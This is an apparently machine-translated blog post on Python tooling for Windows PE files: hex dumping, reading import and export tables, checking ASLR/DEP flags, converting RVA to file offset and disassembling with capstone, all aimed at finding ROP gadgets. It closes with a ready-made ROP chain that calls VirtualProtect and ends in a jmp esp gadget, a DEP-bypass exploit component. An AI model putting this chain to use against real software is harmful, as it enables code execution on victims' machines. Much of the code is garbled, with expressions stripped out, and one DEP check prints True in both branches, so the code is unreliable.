通过利用反汇编库,usingpythonAuthoring tools,retrievePEBase address offset address in the structure,locateOEPand calculated asFOAFile Offset,Disassembling it using disassembly libraries,and from the disassembly code look for the pre-preparedROPBypass Code,Make it auto-complete searches,Here is the implementation idea and some code snippets。
Hexadecimal converter can be added on their own, the file with the offset correspondence, you can realize the specified location of the data conversion, here is a pitiful version of the realization, their own dinner.
#coding:utf-8
import os,sys
import binascii
# binascii.a2b_hex("4d")
if __name__ == "__main__":
count = 0
size = ("")
print("file pointer: {}".format(size))
fp = open("","rb")
lis = []
for item in range(500):
char = (1)
count = count + 1
if count % 16 == 0:
if ord(char) < 16:
print("0" + hex(ord(char))[2:])
else:
print(hex(ord(char))[2:])
else:
if ord(char) < 16:
print("0" + hex(ord(char))[2:] + " ",end="")
else:
print(hex(ord(char))[2:] + " ",end="")
Binary to String Interchange
import os
def to_ascii(h):
list_s = []
for i in range(0, len(h), 2):
list_s.append(chr(int(h[i:i+2], 16)))
return ''.join(list_s)
def to_hex(s):
list_h = []
for c in s:
list_h.append(hex(ord(c))[2:])
return ''.join(list_h)
with open("d://","rb") as fp:
lis = []
for x in range(10240):
for i in range(64):
char = (1)
print(to_ascii(hex(ord(char))[2:]),end="")
print("")Disassembly framework
import os
from capstone import *
CODE = b"\x55\x8b\xec\x6a\x00\xff\x15\x44\x30\x11\x00"
md = Cs(CS_ARCH_X86, CS_MODE_32)
for i in (CODE, 0x1000):
print("Size: %3s Address: %-5s Instruction: %-7s Operands: %-10s"% (,,,i.op_str))
print("*" * 100)
CODE64 = b"\x55\x48\x8b\x05\xb8\x13\x00\x00\xe9\xea\xbe\xad\xde\xff\x25\x23\x01\x00\x00\xe8\xdf\xbe\xad\xde\x74\xff"
md = Cs(CS_ARCH_X86, CS_MODE_64)
for i in (CODE64, 0x1000):
print("Size: %3s Address: %-5s Instruction: %-7s Operands: %-10s"% (,,,i.op_str))Code to read pE structure Read import/export table, with Python It is too meaningless, see C/C++ implementation of PE parsing tool notes.
def ScanImport(filename):
pe = (filename)
print("-" * 100)
try:
for x in pe.DIRECTORY_ENTRY_IMPORT:
for y in :
print("[*] Module name: %-20s Import function: %-14s" %(().decode("utf-8"),().decode("utf-8")))
except Exception:
pass
print("-" * 100)
def ScanExport(filename):
pe = (filename)
print("-" * 100)
try:
for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:
print("[*] Export number: %-5s Module address: %-20s Module name: %-15s"
%(,hex(pe.OPTIONAL_HEADER.ImageBase + ),().decode("utf-8")))
except:
pass
print("-" * 100)Validation of DEP+ASLR
# Random base address => hex(pe.OPTIONAL_HEADER.DllCharacteristics) & 0x40 == 0x40
if( (pe.OPTIONAL_HEADER.DllCharacteristics & 64)==64 ):
print("Base address randomization: True")
else:
print("Base address randomization: False")
# Data not executable DEP => hex(pe.OPTIONAL_HEADER.DllCharacteristics) & 0x100 == 0x100
if( (pe.OPTIONAL_HEADER.DllCharacteristics & 256)==256 ):
print("DEP protection status: True")
else:
print("DEP protection status: True")
# Force integrity = > hex(pe.OPTIONAL_HEADER.DllCharacteristics) & 0x80 == 0x80
if ( (pe.OPTIONAL_HEADER.DllCharacteristics & 128)==128 ):
print("Mandatory Integrity: True")
else:
print("Mandatory Integrity: False")
if ( (pe.OPTIONAL_HEADER.DllCharacteristics & 1024)==1024 ):
print("SEH Exception Protection: False")
else:
print("SEH Exception Protection: True")VA to FOA address
import os
import pefile
def RVA_To_FOA(FilePath):
pe = (FilePath)
ImageBase = pe.OPTIONAL_HEADER.ImageBase
for item in :
if str(('UTF-8').strip(b'\x00'.decode())) == ".text":
#print("Virtual address: 0x%.8X Virtual size: 0x%.8X" %(,item.Misc_VirtualSize))
VirtualAddress =
VirtualSize = item.Misc_VirtualSize
ActualOffset =
StartVA = hex(ImageBase + VirtualAddress)
StopVA = hex(ImageBase + VirtualAddress + VirtualSize)
print("[+] code segment start address: {} close: {} Actual Offset:{} lengths: {}".format(StartVA,StopVA,ActualOffset,VirtualSize))
with open(FilePath,"rb") as fp:
(ActualOffset)
HexCode = (VirtualSize)
print(HexCode)
RVA_To_FOA("d://")
Given an overprotected ROP chain
rop = ('<L',0x7c349614) # ret
rop += ('<L',0x7c34728e) # pop eax
rop += ('<L',0xfffffcdf) #
rop += ('<L',0x7c379c10) # add ebp,eax
rop += ('<L',0x7c34728e) # pop eax
rop += ('<L',0xfffffdff) # value = 0x201
rop += ('<L',0x7c353c73) # neg eax
rop += ('<L',0x7c34373a) # pop ebx
rop += ('<L',0xffffffff) #
rop += ('<L',0x7c345255) # inc ebx
rop += ('<L',0x7c352174) # add ebx,eax
rop += ('<L',0x7c344efe) # pop edx
rop += ('<L',0xffffffc0) # 0x40h
rop += ('<L',0x7c351eb1) # neg edx
rop += ('<L',0x7c36ba51) # pop ecx
rop += ('<L',0x7c38f2f4) # &writetable
rop += ('<L',0x7c34a490) # pop edi
rop += ('<L',0x7c346c0b) # ret (rop nop)
rop += ('<L',0x7c352dda) # pop esi
rop += ('<L',0x7c3415a2) # jmp [eax]
rop += ('<L',0x7c34d060) # pop eax
rop += ('<L',0x7c37a151) # ptr to virtualProtect()
rop += ('<L',0x625011ed) # jmp espThis article on Python conversion and disassembly process to achieve this article is introduced to this, more related Python conversion content please search for my previous articles or continue to browse the following related articles I hope you will support me in the future!